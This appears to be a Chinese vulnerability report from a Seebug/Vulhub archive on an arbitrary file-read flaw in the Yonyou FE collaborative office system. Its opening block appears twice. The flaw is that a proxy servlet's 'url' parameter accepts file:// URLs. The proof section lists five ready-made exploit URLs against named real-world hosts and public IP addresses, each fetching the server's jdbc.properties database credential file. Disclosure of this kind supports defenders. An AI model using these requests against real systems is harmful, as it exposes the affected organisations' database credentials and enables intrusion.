VULHUB ™

### 简要描述： 用友FE协作办公系统某处协议处理接口未过滤file://协议，导致任意文件读取漏洞,通杀全版本 ### 详细说明： ``` web.xml有如下配置： <servlet> <servlet-name>ProxyServletUtil</servlet-name> <servlet-class>fe.witmanage.service.ProxyServletUtil</servlet-class> </servlet> <servlet-mapping> <servlet-name>ProxyServletUtil</servlet-name> <url-pattern>/ProxyServletUtil</url-pattern> </servlet-mapping> ``` [<img src="https://images.seebug.org/upload/201411/072215468809be612ef8d59a43fd660cb1c5e4ef.png" alt="0.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/072215468809be612ef8d59a43fd660cb1c5e4ef.png) ``` ProxyServletUtil.java源码如下: /* */ public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException /* */ { /* 23 */ String urlString = request.getParameter("url"); /* 24 */ writeResponse(response, urlString); /* */ } /* */ /* */ private void writeResponse(HttpServletResponse response, String urlString) throws ServletException { /* */ try { /* 29...

### 简要描述： 用友FE协作办公系统某处协议处理接口未过滤file://协议，导致任意文件读取漏洞,通杀全版本 ### 详细说明： ``` web.xml有如下配置： <servlet> <servlet-name>ProxyServletUtil</servlet-name> <servlet-class>fe.witmanage.service.ProxyServletUtil</servlet-class> </servlet> <servlet-mapping> <servlet-name>ProxyServletUtil</servlet-name> <url-pattern>/ProxyServletUtil</url-pattern> </servlet-mapping> ``` [<img src="https://images.seebug.org/upload/201411/072215468809be612ef8d59a43fd660cb1c5e4ef.png" alt="0.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/072215468809be612ef8d59a43fd660cb1c5e4ef.png) ``` ProxyServletUtil.java源码如下: /* */ public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException /* */ { /* 23 */ String urlString = request.getParameter("url"); /* 24 */ writeResponse(response, urlString); /* */ } /* */ /* */ private void writeResponse(HttpServletResponse response, String urlString) throws ServletException { /* */ try { /* 29 */ URL url = new URL(urlString); /* 30 */ URLConnection urlConnection = url.openConnection(); /* 31 */ response.setContentType(urlConnection.getContentType()); /* 32 */ InputStream ins = urlConnection.getInputStream(); /* 33 */ OutputStream outs = response.getOutputStream(); /* 34 */ byte[] buffer = new byte[this.READ_BUFFER_SIZE]; /* 35 */ int bytesRead = 0; /* 36 */ while ((bytesRead = ins.read(buffer, 0, this.READ_BUFFER_SIZE)) != -1) { /* 37 */ outs.write(buffer, 0, bytesRead); /* */ } /* 39 */ System.out.println(outs); /* 40 */ outs.flush(); /* 41 */ outs.close(); /* 42 */ ins.close(); /* */ } catch (Exception e) { /* */ try { /* 45 */ response.sendError(500, e.getMessage()); /* */ } catch (IOException ioe) { /* 47 */ throw new ServletException(ioe); /* */ } /* */ } /* */ } /* */ } ``` [<img src="https://images.seebug.org/upload/201411/07221637c06d99c1ecedaeaf18fa5874d9a1c2c5.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/07221637c06d99c1ecedaeaf18fa5874d9a1c2c5.png) ``` url参数可控并且无任何过滤，导致任意文件，由于代码逻辑，进行文件读取时需要使用file://协议来利用 ``` ### 漏洞证明： ``` (1)http://oa.hzuf.com:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties ``` [<img src="https://images.seebug.org/upload/201411/072219461a3024b756de6890152fea80cbcd4230.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/072219461a3024b756de6890152fea80cbcd4230.png) ``` (2)http://fsd2014.f3322.org:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties ``` [<img src="https://images.seebug.org/upload/201411/072221015d6a6c843907cf0cd09e671026989400.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/072221015d6a6c843907cf0cd09e671026989400.png) ``` (3)http://183.129.249.246:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties ``` [<img src="https://images.seebug.org/upload/201411/07222157a93556a8969013f1cfb96ef88c56d735.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/07222157a93556a8969013f1cfb96ef88c56d735.png) ``` (4)http://218.205.208.22:9090/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties ``` [<img src="https://images.seebug.org/upload/201411/07222252768a8d94d8cc1b64674abc864e6242bc.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/07222252768a8d94d8cc1b64674abc864e6242bc.png) ``` (5)http://120.196.116.3:7321/ProxyServletUtil?url=file:///d:/FE/jboss/server/default/deploy/fe.war/WEB-INF/classes/jdbc.properties ``` [<img src="https://images.seebug.org/upload/201411/07222340ac7c546f20795326cad881694ce002b7.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201411/07222340ac7c546f20795326cad881694ce002b7.png) ``` ```